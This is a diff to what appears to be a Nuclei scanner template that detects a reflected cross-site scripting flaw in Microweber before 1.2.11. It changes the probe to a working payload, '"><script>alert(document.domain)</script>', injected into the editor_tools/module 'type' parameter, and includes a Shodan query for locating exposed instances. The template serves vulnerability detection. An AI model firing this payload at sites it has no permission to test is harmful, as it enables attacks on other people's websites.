--- a/vulnerabilities/other/microweber-xss.yaml
+++ b/vulnerabilities/other/microweber-xss.yaml
@@ -7,22 +7,28 @@ info:
   description: Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11.
   reference:
     - https://github.com/microweber/microweber/issues/809
-  tags: microweber,xss
+    - https://github.com/microweber/microweber
   metadata:
     shodan-query: 'http.favicon.hash:780351152'
+  tags: microweber,xss,oss
 
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/editor_tools/module?type=files/admin"><script>alert(1)</script>&params=filetype=images#path='
+      - '{{BaseURL}}/editor_tools/module?type=files/admin"><script>alert(document.domain)</script>&params=filetype=images#path='
 
     matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 200
-
       - type: word
         part: body
         words:
-          - '<script>alert(1)</script>'
+          - '<script>alert(document.domain)</script>" 0="filetype=images"'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
